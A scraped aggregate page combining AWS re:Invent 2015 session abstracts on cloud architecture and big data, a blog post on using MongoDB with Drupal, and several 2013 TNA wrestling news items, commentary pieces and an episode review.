          Shared pools of resources? Microservices in containers? Isolated application stacks? You have many architectural models and AWS services to consider when you deploy applications on AWS. This session focuses on several common models and helps you choose the right path or paths to fit your application needs. Architects and operations managers should consider this session to help them choose the optimal path for their application deployment needs for their current and future architectures. This session covers services such as Amazon Elastic Compute Cloud (Amazon EC2), EC2 Container Services, AWS Lambda, and AWS CodeDeploy. View Less
          ARC313 - Future Banks Live in the Cloud: Building a Usable Cloud with Uncompromising Security
          Running today's largest consumer bitcoin startup comes with a target on your back and requires an uncompromising approach to security. This talk explores how Coinbase is learning from the past and pulling out all the stops to build a secure infrastructure behind an irreversibly transferrable digital good for millions of users. This session will cover cloud architecture, account and network isolation in the AWS cloud, disaster recovery, self-service consensus-based deployment, real-time streaming insight, and how Coinbase is leveraging practical DevOps to build the bank of the future. View Less
          ARC311 - Decoding the Genetic Blueprint of Life on a Cloud Connected Ecosystem
          Thermo Fisher Scientific, a world leader in biotechnology, has built a new polymerase chain reaction (PCR) system for DNA sequencing. Designed for low- to midlevel throughput laboratories that conduct real time PCR experiments, the system runs on individual QuantStudio devices. These devices are connected to Thermo Fisher's cloud computing platform, which is built on AWS using Amazon EC2, Amazon DynamoDB, and Amazon S3. With this single platform, applied and clinical researchers can learn, analyze, share, collaborate, and obtain support. Researchers worldwide can now collaborate online in real time and access their data wherever and whenever necessary. Laboratories can also share experimental conditions and results with their partners while providing a uniform experience for every user and helping to minimize training and errors. The net result is increased collaboration, faster time to market, fewer errors, and lower cost. We have architected a solution that uses Amazon EMR, DynamoDB, Amazon Elasticache, and S3. In this presentation, we share our architecture, lessons learned, best design patterns for NoSQL, strategies for leveraging EMR with DynamoDB, and a flexible solution that our scientist use. We also share our next step in architecture evolution. View Less
          ARC310-APAC - Amazon.com: Solving Amazon's Catalog Contention and Cost with Amazon Kinesis (APAC track)
          The Amazon.com product catalog receives millions of updates each hour across billions of products, and many of the updates involve comparatively few products. In this... View More
          ARC310 - Amazon.com: Solving Amazon's Catalog Contention and Cost with Amazon Kinesis
          The Amazon.com product catalog receives millions of updates an hour across billions of products with many of the updates concentrated on comparatively few products. In this session, hear how Amazon.com has used Amazon Kinesis to build a pipeline orchestrator that provides sequencing, optimistic batching, and duplicate suppression whilst at the same time significantly lowering costs. This session covers the architecture of that solution and draws out the key enabling features that Amazon Kinesis provides. This talk is intended for those who are interested in learning more about the power of the distributed log and understanding its importance for enabling OLTP just as DHT is for storage. View Less
          ARC309 - From Monolithic to Microservices: Evolving Architecture Patterns in the Cloud
          Gilt, a billion dollar e-commerce company, implemented a sophisticated microservices architecture on AWS to handle millions of customers visiting their site at noon every day. The microservices architecture pattern enables independent service scaling, faster deployments, better fault isolation, and graceful degradation. In this session, Derek Chiles, AWS solutions architect, will review best practices and recommended architectures for deploying microservices on AWS. Adrian Trenaman, SVP of engineering at Gilt, will share Gilt's experiences and lessons learned during their evolution from a single monolithic Rails application in a traditional data center to more than 300 Scala/Java microservices deployed in the cloud. View Less
          ARC308-APAC - The Serverless Company with AWS Lambda: Streamlining Architecture with AWS (APAC track)
          In today's competitive environment, startups are increasingly focused on eliminating any undifferentiated heavy lifting. Come learn about various architectural patterns for building scalable, function-rich data processing systems using AWS Lambda and other AWS managed services. Find out how PlayOn! Sports went from a multi-layered architecture for video streaming to a streamlined and serverless system by using AWS Lambda and Amazon S3. This is a repeat session that will be translated simultaneously into Japanese, Chinese, and Korean. View Less
          ARC308 - The Serverless Company Using AWS Lambda: Streamlining Architecture with AWS
          In today's competitive environment, startups are increasingly focused on eliminating any undifferentiated heavy lifting. Come learn about various architectural patterns for building a scalable, function-rich data processing systems, using AWS Lambda and other AWS managed services. Come see how PlayOn! Sports went from a multi-layered architecture for video streaming to a streamlined and serverless system using Lambda and Amazon S3. View Less
          ARC307 - Infrastructure as Code
          While many organizations have started to automate their software develop processes, many still engineer their infrastructure largely by hand. Treating your infrastructure just like any other piece of code creates a “programmable infrastructure” that allows you to take full advantage of the scalability and reliability of the AWS cloud. This session will walk through practical examples of how AWS customers have merged infrastructure configuration with application code to create application-specific infrastructure and a truly unified development lifecycle. You will learn how AWS customers have leveraged tools like CloudFormation, orchestration engines, and source control systems to enable their applications to take full advantage of the scalability and reliability of the AWS cloud, create self-reliant applications, and easily recover when things go seriously wrong with their infrastructure. View Less
          ARC305 - Self-service Cloud Services: How J&J Is Managing AWS at Scale for Enterprise Workloads
          Johnson & Johnson is a global health care leader with 270 operating companies in 60 countries. Operating at this scale requires a decentralized model that supports the autonomy of the different companies under the J&J umbrella, while still allowing knowledge and infrastructure frameworks to be shared across the different businesses. To address this problem, J&J created an Amazon VPC, which provides simplified architecture patterns that J&J's application teams leveraged throughout the company using a self-service model while adhering to critical internal controls. Hear how J&J leveraged Amazon S3, Amazon Redshift, Amazon RDS, Amazon DynamoDB, and Amazon Kinesis to develop these architecture patterns for various use cases, allowing J&J's businesses to use AWS for its agility while still adhering to all internal policies automatically. Learn how J&J uses this model to build advanced analytic platforms to ingest large streams of structured and unstructured data, which minimizes the time to insight in a variety of areas, including physician compliance, bioinformatics, and supply chain management. View Less
          ARC304 - Designing for SaaS: Next-Generation Software Delivery Models on AWS
          SaaS architectures can be deployed onto AWS in a number of ways, and each optimizes for different factors from security to cost optimization. Come learn more about common deployment models used on AWS for SaaS architectures and how each of those models are tuned for customer specific needs. We will also review options and tradeoffs for common SaaS architectures, including cost optimization, resource optimization, performance optimization, and security and data isolation. View Less
          ARC303 - Pure Play Video OTT: A Microservices Architecture in the Cloud
          An end-to-end, over-the-top (OTT) video system is built of many interdependent architectural tiers, ranging from content preparation, content delivery, and subscriber and entitlement management, to analytics and recommendations. This talk will provide a detailed exploration of how to architect a media platform that allows for growth, scalability, security, and business changes at each tier, based on real-world experiences delivering over 100 Gbps of concurrent video traffic with 24/7/365 linear TV requirements. Finally, learn how Verizon uses AWS, including Amazon Redshift and Amazon Elastic MapReduce, to power its recently launched mobile video application Go90. Using a mixture of AWS services and native applications, we address the following scaling challenges:     Content ingest, preparation, and distribution     Operation of a 24x7x365 Linear OTT Playout Platform     Common pitfalls with transcode and content preperation     Multi-DRM and packaging to allow cross platform playback     Efficient delivery and multi-CDN methodology to allow for a perfect experience globally     Kinesis as a dual purpose system for both analytics and concurrency access management     Integration with Machine Learning for an adaptive recommendation system, with real time integration between content history and advertising data     User, entitlement, and content management     General best practices for ‘Cloud Architectures' and their integration with Amazon Web Services; Infrastructure as Code, Disposable and immutable infrastructure, code deployment & release management, DevOps and Microservices Architectures This session is great for architects, engineers, and CTOs within media and entertainment or others simply interested in decoupled architectures. View Less
          ARC302 - Running Lean Architectures: How to Optimize for Cost Efficiency
          Whether you're a cash-strapped startup or an enterprise optimizing spend, it pays to run cost-efficient architectures on AWS. This session reviews a wide range of cost planning, monitoring, and optimization strategies, featuring real-world experience from AWS customers. We'll cover how you can effectively combine EC2 On-Demand, Reserved, and Spot instances to handle different use cases, leveraging auto scaling to match capacity to workload, choosing the most optimal instance type through load testing, taking advantage of multi-AZ support, and using CloudWatch to monitor usage and automatically shut off resources when not in use. We'll discuss taking advantage of tiered storage and caching, offloading content to Amazon CloudFront to reduce back-end load, and getting rid of your back end entirely, by leveraging AWS high-level services. We will also showcase simple tools to help track and manage costs, including the AWS Cost Explorer, Billing Alerts, and Trusted Advisor. This session will be your pocket guide for running cost effectively in the Amazon cloud. View Less
          ARC301 - Scaling Up to Your First 10 Million Users
          Cloud computing gives you a number of advantages, such as the ability to scale your web application or website on demand. If you have a new web application and want to use cloud computing, you might be asking yourself, "Where do I start?" Join us in this session to understand best practices for scaling your resources from zero to millions of users. We show you how to best combine different AWS services, how to make smarter decisions for architecting your application, and how to scale your infrastructure in the cloud. View Less
          ARC201 - Microservices Architecture for Digital Platforms with AWS Lambda, Amazon CloudFront and Amazon DynamoDB
          Digital platforms are by nature resource intensive, expensive to build, and difficult to manage at scale. What if we can change this perception and help AWS customers architect a digital platform that is low cost and low maintenance? This session describes the underlying architecture behind dam.deep.mg, the Digital Asset Management system built by Mitoc Group and powered by AWS abstracted services like AWS Lambda, Amazon CloudFront, and Amazon DynamoDB. Eugene Istrati, the CTO of Mitoc Group, will dive deep into their approach to microservices architecture on serverless environments and demonstrate how anyone can architect AWS abstracted services to achieve high scalability, high availability, and high performance without huge efforts or expensive resources allocation. View Less
          WRK304 - Build a Recommendation Engine and Use Amazon Machine Learning in Real Time
          Build an exciting machine learning model for recommending top restaurants for a customer in real time based on past orders and viewing history. In this guided session you will get hands on with data cleansing, building AML model and doing real time predictions. Dataset will be provided. Prerequisites: Participants should have an AWS account established and available for use during the workshop.  Participants should bring their own laptop.    Capacity: To encourage the interactive nature of this workshop, the session capacity is limited to approximately 70 attendees.  Attendance is based on a first come, first served basis once onsite.  Scheduling tools in the session catalog are for planning purposes only. View Less
          WRK303 - Real-World Data Warehousing with Amazon Redshift and Big Data Solutions from AWS Marketplace
          In this workshop, you will work with other attendees as a small team to build an end-to-end data warehouse using Amazon Redshift and by leveraging key AWS Marketplace partners. Your team will learn how to build a data pipeline using an ETL partner from the AWS Marketplace, to perform common validation and aggregation tasks in a data ingestion pipeline.  Your team will then learn how to build dashboards and reports using a Data visualization partner from AWS Marketplace, for interactive analysis of large datasets in Amazon Redshift. In less than 2 hours your team will build a fully functional solution to discover meaningful insights from raw-datasets. The session also showcase on how you can extend this solution further to create a near real-time solution by leveraging Amazon Kinesis and other AWS Big Data services. Prerequisites: Hands-on experience with AWS. Some prior experience with Databases, SQL and familiarity with data-warehousing concepts. Capacity: To encourage the interactive nature of this workshop, the session capacity is limited to approximately 70 attendees.  Attendance is based on a first come, first served basis once onsite.  Scheduling tools in the session catalog are for planning purposes only.   View Less
          WRK301 - Implementing Twitter Analytics Using Spark Streaming, Scala, and Amazon EMR
          Over the course of this workshop, we will launch a Spark Custer and deploy a Spark streaming application written in Scala that analyzes popular tags flowing out of Twitter.  Along the way we will learn about AWS EMR, Spark, Spark Streaming, Scala, and how to deploy applications into Spark clusters on AWS EMR. Prerequisites: Participants are expected be familiar with building modest-size applications in Scala. Participants should have an AWS account established and available for use during the workshop.  Please bring your laptop. Capacity: To encourage the interactive nature of this workshop, the session capacity is limited to approximately 70 attendees.  Attendance is based on a first come, first served basis once onsite.  Scheduling tools in the session catalog are for planning purposes only.   View Less
          BDT404 - Building and Managing Large-Scale ETL Data Flows with AWS Data Pipeline and Dataduct
          As data volumes grow, managing and scaling data pipelines for ETL and batch processing can be daunting. With more than 13.5 million learners worldwide, hundreds of courses, and thousands of instructors, Coursera manages over a hundred data pipelines for ETL, batch processing, and new product development. In this session, we dive deep into AWS Data Pipeline and Dataduct, an open source framework built at Coursera to manage pipelines and create reusable patterns to expedite developer productivity. We share the lessons learned during our journey: from basic ETL processes, such as loading data from Amazon RDS to Amazon Redshift, to more sophisticated pipelines to power recommendation engines and search services. Attendees learn: Do's and don'ts of Data Pipeline Using Dataduct to streamline your data pipelines How to use Data Pipeline to power other data products, such as recommendation systems What's next for Dataduct View Less
          BDT403 - Best Practices for Building Real-time Streaming Applications with Amazon Kinesis
          Amazon Kinesis is a fully managed, cloud-based service for real-time data processing over large, distributed data streams. Customers who use Amazon Kinesis can continuously capture and process real-time data such as website clickstreams, financial transactions, social media feeds, IT logs, location-tracking events, and more. In this session, we first focus on building a scalable, durable streaming data ingest workflow, from data producers like mobile devices, servers, or even a web browser, using the right tool for the right job. Then, we cover code design that minimizes duplicates and achieves exactly-once processing semantics in your elastic stream-processing application, built with the Kinesis Client Library. Attend this session to learn best practices for building a real-time streaming data architecture with Amazon Kinesis, and get answers to technical questions frequently asked by those starting to process streaming events. View Less
          BDT402 - Delivering Business Agility Using AWS
          Wipro is one of India's largest publicly traded companies and the seventh largest IT services firm in the world. In this session, we showcase the structured methods that Wipro has used in enabling enterprises to take advantage of the cloud. These cover identifying workloads and application profiles that could benefit, re-structuring enterprise application and infrastructure components for migration, rapid and thorough verification and validation, and modifying component monitoring and management. Several of these methods can be tailored to the individual client or functional context, so specific client examples are presented. We also discuss the enterprise experience of enabling many non-IT functions to benefit from the cloud, such as sales and training. More functions included in the cloud increase the benefit drawn from a cloud-enabled IT landscape. Session sponsored by Wipro. View Less
          BDT401 - Amazon Redshift Deep Dive: Tuning and Best Practices
          Get a look under the covers: Learn tuning best practices for taking advantage of Amazon Redshift's columnar technology and parallel processing capabilities to improve your delivery of queries and improve overall database performance. This session explains how to migrate from existing data warehouses, create an optimized schema, efficiently load data, use work load management, tune your queries, and use Amazon Redshift's interleaved sorting features. Finally, learn how TripAdvisor uses these best practices to give their entire organization access to analytic insights at scale.  View Less
          BDT324 - Big Data Optimized for the AWS Cloud
          Apache Hadoop is now a foundational platform for big data processing and discovery that drives next-generation analytics. While Hadoop was designed when cloud models were in their infancy, the open source platform works remarkably well in production environments in the cloud. This talk will cover use cases for running big data in the cloud and share examples of organizations that have experienced real-world success on AWS. We will also look at new software and hardware innovations that are helping companies get more value from their data. Session sponsored by Intel. View Less
          BDT323 - Amazon EBS and Cassandra: 1 Million Writes Per Second on 60 Nodes
          With the introduction of Amazon Elastic Block Store (EBS) GP2 and recent stability improvements, EBS has gained credibility in the Cassandra world for high performance workloads. By running Cassandra on Amazon EBS, you can run denser, cheaper Cassandra clusters with just as much availability as ephemeral storage instances. This talk walks through a highly detailed use case and configuration guide for a multi PetaByte, million write per second cluster that needs to be high performing and cost efficient. We explore the instance type choices, configuration, and low-level tuning that allowed us to hit 1.3 million writes per second with a replication factor of 3 on just 60 nodes. View Less
          BDT322 - How Redfin and Twitter Leverage Amazon S3 to Build Their Big Data Platforms
          Analyzing large data sets requires significant compute and storage capacity that can vary in size based on the amount of input data and the analysis required. This characteristic of big data workloads is ideally suited to the pay-as-you-go cloud model, where applications can easily scale up and down based on demand. Learn how Amazon S3 can help scale your big data platform. Hear from Redfin and Twitter about how they build their big data platforms on AWS and how they use S3 as an integral piece of their big data platforms. View Less
          BDT320 - NEW LAUNCH! Streaming Data Flows with Amazon Kinesis Firehose and Amazon Kinesis Analytics
          Amazon Kinesis Firehose is a fully-managed, elastic service to deliver real-time data streams to Amazon S3, Amazon Redshift, and other destinations. In this session, we start with overviews of Amazon Kinesis Firehose and Amazon Kinesis Analytics. We then discuss how Amazon Kinesis Firehose makes it even easier to get started with streaming data, without writing a stream processing application or provisioning a single resource. You learn about the key features of Amazon Kinesis Firehose, including its companion agent that makes emitting data from data producers even easier. We walk through capture and delivery with an end-to-end demo, and discuss key metrics that will help developers and architects understand their streaming data flow. Finally, we look at some patterns for data consumption as the data streams into S3. We show two examples: using AWS Lambda, and how you can use Apache Spark running within Amazon EMR to query data directly in Amazon S3 through EMRFS. View Less
          BDT319 - NEW LAUNCH! Amazon QuickSight: Very Fast, Easy-to-Use, Cloud-native Business Intelligence
          Amazon QuickSight is a very fast, cloud-powered business intelligence (BI) service that makes it easy to build visualizations, perform ad-hoc analysis, and quickly get business insights from your data. In this session, we demonstrate how you can point Amazon QuickSight to AWS data stores, flat files, or other third-party data sources and begin visualizing your data in minutes. We also introduce SPICE -  a new Super-fast, Parallel, In-memory, Calculation Engine in Amazon QuickSight, which performs advanced calculations and render visualizations rapidly without requiring any additional infrastructure, SQL programming, or dimensional modeling, so you can seamlessly scale to hundreds of thousands of users and petabytes of data. Lastly, you will see how Amazon QuickSight provides you with smart visualizations and graphs that are optimized for your different data types, to ensure the most suitable and appropriate visualization to conduct your analysis, and how to share these visualization stories using the built-in collaboration tools. View Less
          BDT318 - Netflix Keystone: How Netflix Handles Data Streams Up to 8 Million Events Per Second
          In this session, Netflix provides an overview of Keystone, their new data pipeline. The session covers how Netflix migrated from Suro to Keystone, including the reasons behind the transition and the challenges of zero loss while processing over 400 billion events daily. The session covers in detail how they deploy, operate, and scale Kafka, Samza, Docker, and Apache Mesos in AWS to manage 8 million events & 17 GB per second during peak. View Less
          BDT317 - Building a Data Lake on AWS
          Conceptually, a data lake is a flat data store to collect data in its original form, without the need to enforce a predefined schema. Instead, new schemas or views are created “on demand”, providing a far more agile and flexible architecture while enabling new types of analytical insights. AWS provides many of the building blocks required to help organizations implement a data lake. In this session, we will introduce key concepts for a data lake and present aspects related to its implementation. We will discuss critical success factors, pitfalls to avoid as well as operational aspects such as security, governance, search, indexing and metadata management. We will also provide insight on how AWS enables a data lake architecture.   A data lake is a flat data store to collect data in its original form, without the need to enforce a predefined schema. Instead, new schemas or views are created "on demand", providing a far more agile and flexible architecture while enabling new types of analytical insights. AWS provides many of the building blocks required to help organizations implement a data lake. In this session, we introduce key concepts for a data lake and present aspects related to its implementation. We discuss critical success factors and pitfalls to avoid, as well as operational aspects such as security, governance, search, indexing, and metadata management. We also provide insight on how AWS enables a data lake architecture. Attendees get practical tips and recommendations to get started with their data lake implementations on AWS. View Less
          BDT316 - Offloading ETL to Amazon Elastic MapReduce
          Amgen discovers, develops, manufactures, and delivers innovative human therapeutics, helping millions of people in the fight against serious illnesses. In 2014, Amgen implemented a solution to offload ETL data across a diverse data set (U.S. pharmaceutical prescriptions and claims) using Amazon EMR. The solution has transformed the way Amgen delivers insights and reports to its sales force. To support Amgen's entry into a much larger market, the ETL process had to scale to eight times its existing data volume. We used Amazon EC2, Amazon S3, Amazon EMR, and Amazon Redshift to generate weekly sales reporting metrics. This session discusses highlights in Amgen's journey to leverage big data technologies and lay the foundation for future growth: benefits of ETL offloading in Amazon EMR as an entry point for big data technologies; benefits and challenges of using Amazon EMR vs. expanding on-premises ETL and reporting technologies; and how to architect an ETL offload solution using Amazon S3, Amazon EMR, and Impala. View Less
          BDT314 - Running a Big Data and Analytics Application on Amazon EMR and Amazon Redshift with a Focus on Security
          No matter the industry, leading organizations need to closely integrate, deploy, secure, and scale diverse technologies to support workloads while containing costs. Nasdaq, Inc.-a leading provider of trading, clearing, and exchange technology-is no exception. After migrating more than 1,100 tables from a legacy data warehouse into Amazon Redshift, Nasdaq, Inc. is now implementing a fully-integrated, big data architecture that also includes Amazon S3, Amazon EMR, and Presto to securely analyze large historical data sets in a highly regulated environment. Drawing from this experience, Nasdaq, Inc. shares lessons learned and best practices for deploying a highly secure, unified, big data architecture on AWS. Attendees learn: Architectural recommendations to extend an Amazon Redshift data warehouse with Amazon EMR and Presto. Tips to migrate historical data from an on-premises solution and Amazon Redshift to Amazon S3, making it consumable. Best practices for securing critical data and applications leveraging encryption, SELinux, and VPC. View Less
          BDT313 - Amazon DynamoDB for Big Data
          NoSQL is an important part of many big data strategies. Attend this session to learn how Amazon DynamoDB helps you create fast ingest and response data sets. We demonstrate how to use DynamoDB for batch-based query processing and ETL operations (using a SQL-like language) through integration with Amazon EMR and Hive. Then, we show you how to reduce costs and achieve scalability by connecting data to Amazon ElasticCache for handling massive read volumes. We'll also discuss how to add indexes on DynamoDB data for free-text searching by integrating with Elasticsearch using AWS Lambda and DynamoDB streams. Finally, you'll find out how you can take your high-velocity, high-volume data (such as IoT data) in DynamoDB and connect it to a data warehouse (Amazon Redshift) to enable BI analysis. View Less
          BDT312 - Application Monitoring in a Post-Server World: Why Data Context Is Critical
          The move towards microservices in Docker, EC2 and Lambda points to a shift towards shorter lived resources. These new application architectures are driving new agility and efficiency. But they, while providing developers with inherent scalability, elasticity, and flexibility, also present new challenges for application monitoring. The days of static server monitoring with a single health and status check are over. These days you need to know how your entire ecosystem of AWS EC2 instances are performing, especially since many of them are short lived and may only exist for a few minutes. With such ephemeral resources, there is no server to monitor; you need to understand performance along the lines of computation intent. And for this, you need the context in which these resources are performing. Join Kevin McGuire, Director of Engineering at New Relic, as he discusses trends in computing that we've gleaned from monitoring Docker and how they'v
                    Using MongoDB With Drupal        
          Using MongoDB With Drupal
          mongodb
          David Csonka Fri, 02/03/2017 - 04:04

          Because of the database abstraction layer that was added in Drupal 7, it is fairly convenient to use a variety of database servers for the backend of your Drupal software. While the term "database abstraction layer" does sound rather sophisticated, and the code involved is certainly not insignificant, in layman's terms what this system does is provide a way for a Drupal developer and Drupal modules to work with its database without generally having to be concerned with what type of database it is.

          Generally speaking though, this works very well with relational model databases, such as MySQL. These types of databases are composed of various tables which are connected by relationships of keys. The relational model of databases is a very successful one and has been studied and improved for decades now. Schemas and relational integrity are important features of this model that makes it useful for content management systems.

          There are other types of database models though, most having been around just as long. NoSQL is a popular classification that is often used to refer to non-relational database types, and MongoDB is a somewhat newer database system built around document collections that fit into this category.

          Not storing data in tables with rows and columns, MongoDB keeps it in documents that have a JSON-like format. As well, these documents aren't bound by a strict universal schema, so your data can easily change over time without requiring retroactive edits to older documents. Some of the key qualities that have attracted users to MongoDB are its built-in performance enhancing features, such as high availability with replica sets and load-balancing with horizontal sharding.

          That is quite obviously a very cursory review of the technical aspects of MongoDB, but you can read in more detail about it on their main website.

          While document-based databases are not new, the release of MongoDB several years ago created quite a stir and made developers very interested in finding uses for it in their applications, usually to take advantage of its vaunted performance qualities.

          Can you use MongoDB with Drupal?

          The short answer is "yes", sort of. Drupal 7 saw the release of the MongoDB module. An important thing to realize though is that this integration does not allow for completely switching to using MongoDB as the database for your Drupal installation. Despite the utility of the Drupal database API we previously mentioned, there are still aspects of how a content management system like Drupal works that don't lend themselves well to the document storage nature of MongoDB. For Drupal 7 a significant number of components of Drupal can still be stored by MongoDB, and for Drupal 8 possibly, even more, when the work on the module is completed.

          See the table on the module project page to review which Drupal features can be converted to use MongoDB.

          So, will you see performance boosts to your Drupal website by just integrating MongoDB to store various components, like entities or blocks? It is possible to gain a small performance increase, but this is not guaranteed, is almost assuredly dependent on the nature of your website and its content.

          A document storage database like MongoDB is much better suited at server lots of "reads" very quickly and allows for scaling to multiple servers very easily. So, if you have a large website that servers an enormous amount of content to be read (and not updated) by users, it might be advantageous to use a solution like MongoDB.

          However, if you have a lot of interactive content with editing and updating, so writes to the database, then MongoDB may not offer any improvements and actually may cause problems with duplication if not properly managed.

          The important thing to realize here is that many popular technologies are not automatically a good solution simply because they are being talked about and used by well-known tech luminaries. Most tools have a use-case that matches their features, and MongoDB is no different. Be sure to learn more about this database system before determining if it will be a useful addition to your project.


                    News: Another round of shock TNA releases        

          Over the course of the past several days, TNA Wrestling have continued their company restructuring and released several notable talents.

          Tara, a five-time Knockouts Champion and one-time Knockouts Tag Team Champion, was released from her contract yesterday on 16th July 2013. After a brief hiatus from TNA programming for the past several months, Tara reappeared two weeks ago managing Jessie Godderz and Robbie E. Her final singles match was a losing effort against ODB on a recent episode of Xplosion.

          Drew Hankinson aka D.O.C., a long-time member of the Aces & Eights faction, revealed yesterday that TNA had allowed his contract to expire on 12th July 2013, with no intention of renewal. Hankinson was one of the first members of the heel faction to be revealed and had anchored the group for over a year. On a recent episode of Impact Wrestling, there appeared to be dissension among the group, as Hankinson refused to eliminate himself from a Battle Royal to determine which member of Aces & Eights took a spot in the Bound for Glory Series.

          Bruce Prichard, the Head of Programming and Talent Relations, was among those asked to restructure their deal in the wake of company changes, however, rather than accept the new deal, Prichard declined and is believed to be on his way out. Prichard had also long been a member of the Gut Check Challenge judging panel, often offering the most unpopular decision of the three.

          Clem's Take - These roster cuts are beginning to look like a massacre. TNA have basically eliminated their entire undercard with these wholesale changes and compromised several angles/divisions in the process.

          Tara, while I'm sure Jessie can manage coming down to the ring on his own from now on, was a vital piece of the Knockout puzzle for the longest time. The recent 'State of the Knockouts' segment on Impact revealed the severely depleted roster, made up entirely of Mickie, Velvet, Taryn and Gail. Only four women wrestling and they choose to release a touchstone of the division? However, I do expect to see her back sooner or later. It wasn't that long ago that Tara was released the last time, only to reappear as Madison Rayne's mysterious biker bodyguard.

          Hankinson is another cut that genuinely takes me by surprise. Not because he's that big a part of TNA programming, but simply because of his affiliation with Aces & Eights. The faction are in a heated feud with the resurrected Main Event Mafia and this is the worst possible time to be seen losing a member. At the very least, they should've played up his arguments with Mr Anderson for several weeks, before finally ejecting him from the group. Frankly, if TNA are looking at members of Aces & Eights to release, Wes Brisco, Garret Bischoff and Mike Knox would've appeared on my radar well before Hankinson.

          Prichard is probably the biggest surprise in the bunch, even if he is the least well-known as an on-air personality. Being such an important member of TNA upper management, losing that cog in the machine could cost the company in the short term while they scramble to replace him. However, this wasn't so much a case of him being pushed, as him jumping. The new deal wasn't to his liking and he's going elsewhere as a result. Being his choice, that puts him ahead of every other talent released in the past few weeks!
                    News: TNA Knockouts Tag Team Championships officially retired        

          The roster page on Impact Wrestling's website appears to indicate the Knockouts Tag Team Championships have finally been retired.

          The titles had been long inactive, having been won by the inter-gender tag team of Eric Young and ODB on February 28th, 2012 and defended sporadically.

          Several weeks ago, on an episode of Impact Wrestling, the Knockouts General Manager Brooke Hogan vacated the titles, due to Young's being a man. It seems as though this will be the last we hear of them.

          Clem's Take: I'm hardly surprised by the move and could've seen it happen sooner. The Knockouts division simply doesn't have enough depth to sustain a tag team division. Hell, they barely have enough depth to sustain a singles division anymore. For whatever reason, TNA have let the division fall into disarray and besides feuds for the title, don't bother to fly in more than four women at a time.
                    Trash Talking: State of the Knockouts         
          written by Rob Poulloin

          On the previous episode of Impact Wrestling (20/06), Knockouts official Brooke Hogan addressed the current state of the division, she praised and hyped the division but somehow failed to notice that by the end of the segment there were only four wrestlers in the ring. 

          The Knockouts suffer similar to the Tag Team and X Division and is often considered an after thought to the main event scene and with all focus on the BFG series it is unlikely much else will get a look in this summer. The segment was placed to highlight the division especially on the back of the well received match at Slammiversary between Gail Kim and Taryn Terrell and hype what will be on offer this summer, but beyond the aforementioned being booked in a Ladder Match to continue their feud and Velvet Sky getting her rematch for the title against Mickie James the division looks light on the ground missing a number of names such as Brooke Tessmacher, Tara; who announced that she would be off Impact for a few months and the pregnant Madison Rayne. 

          Champion Mickie James
          has a lack of competion
          image by Impact Wrestling
          The segment started off with six wrestlers in the ring, but these included KO tag team champion and current referee ODB and her husband Eric Young who haven't defended the belts in over a year, thankfully they vacated the belts with EY admitting he wasn't a woman and hopefully these belts won't be seen for the foreseeable future until the division has the number of competitors to make it worth while having them around. 

          With the lack of wrestlers around it surprised me that TNA didn't make an effort to put Gut Check contestant Taeler Hendrix in the ring, especially as she had a match a few weeks ago and will provide a much needed opponent once we have seen the rematches announced and no doubt tag team match pitting the heels against the faces. 

          Besides announcing two future matches this segment didn't really add much to the show and could have easily taken place backstage and have been shorter. Without Mickie James entertaining new heel role this segment would have fallen flat on its face, Brooke Hogan stumbled through her lines whilst Terrell blended into the background with her win over Gail Kim was over looked completely. If TNA want the Knockouts to excite through the summer then more effort and bodies are going to be needed than this showing.  
           

                    Review: Impact Wrestling 13/06/2013 Hour 2        

          Opening the second hour of this week's Impact Wrestling was another BFG Series qualifying match, Austin Aries vs Eric Young. Naturally, Young's chances of beating 'The Greatest Man That Ever Lived' were slim to none, but all credit to him, he knows how to entertain a crowd. Both he and 'wife' ODB are infinitely entertaining. I particularly enjoyed the spot where after Aries had spun around on Young's back, ODB entered the ring and allowed Young to spin around on hers. They're a quality double act and it's a shame Young has to spend so long away from TNA shooting his nature show. Exemplified by the video package bringing to attention the pair are still the Knockout Tag Team Champions and have failed to defend their titles in over six months! Austin Aries was his usual cocky self, dominating proceedings and even getting a healthy crowd response. I did worry slightly however, as Aries looked even more pissed off than usual. This is a star who easily grows disenchanted with the wrestling business and I fear he's still reeling from the Christy Hemme incident last month. I trust TNA appreciate what a world class athlete they have in Aries and he's treated well in the coming months. Sufficed to say, entrance into the BFG Series bodes well, as he nailed Eric Young with a devastating Brainbuster and moved into the tournament with ease.


          Next up was the Aces & Eights' Battle Royal. Set up by Hogan at the top of the show, designed to divide the group, it almost did just that. Mr Anderson, being the new VP of the group, was clearly their pick for winner and entry into the BFG Series. Most members had no problem with this, being eliminated from the match in a variety of silly ways. He finger-banged Brisco (that just sounds wrong), spun Bischoff around in an exaggerated manner, had Knox backing away in fear and "convinced" Devon to get the tables. I'm not usually a fan of Aces & Eights, but this segment was pretty funny. The only fly in the ointment was when Anderson attempted to "magically" throw Doc over the top rope and the big man merely looked at him in disgust. After a few more tries, Anderson grew weary of Doc's defiance and the former Luke Gallows exploded on the Asshole. That had to have been the defining segment of Doc's career and the biggest face pop he'll ever likely receive. He looked good rebelling against his brothers, perhaps planting the seeds for something more down the line. Unfortunately, Anderson dumped his ass out of the ring and achieved the desired result regardless.


          To close the show, we had another amazing installment of AJ Styles vs Kurt Angle. What's left to be said about these two top tier talents and their combined magnificence. A few months ago, Angle even admitted Styles was the reason he came to TNA in the first place (Samoa Joe must be hanging his head in shame and walking away like Charlie Brown right now). We've seen this match a thousand times now and yet somehow they still find ways to make it different and entertaining. Hell, they only just worked Slammiversary together, giving yet another possible Match of the Year candidate. Where a TV main event would usually get the short end of the stick, seeing far less innovation than their PPV counterpart, I don't think either man is capable of giving it less than their all. AJ's new tweener character being nicely reinforced with several terrifying moves to Angle, namely his new Calf-killer submission and a nasty looking snap DDT into the corner. Eventually, AJ won the match by taking advantage of a distraction from Aces & Eights to roll Angle up from behind, but at this point it didn't matter who won, we'd already been thoroughly entertained and there will always be another encounter for the loser to gain his heat back.


          However, rather than ending on Styles' celebration, the Phenomenal One was quick to hightail it out of there, leaving Angle to take the brunt of Aces & Eights' fury alone. But the Olympic Gold Medalist wasn't alone for long, as TNA's latest acquisition, Rampage Jackson, ran down to the ring and chased off the Sons of Anarchy wannabes with his chain (which you'll never actually see connect with anyone, despite swinging it here, there and everywhere ala Abyss' Janice). This nicely played into the pair's confrontation from last week and hyped their eventual match together. Not that it's going to be any time soon, mind you. Rampage still has months of work to be done down in developmental at OVW before he can even think about getting in the ring with the best worker of our time. In hindsight, it's a little strange to devote two weeks of shows to building to a match that won't happen for the foreseeable future, but I suppose if the opposition can book their main events a year in advance, anything is possible in this business. Fingers crossed the MMA star will be ready for something by Bound for Glory in October.

          8 out of 10

          A show that started off poorly, but slowly rebuilt our trust over the course of an hour and amazed us with it's second.
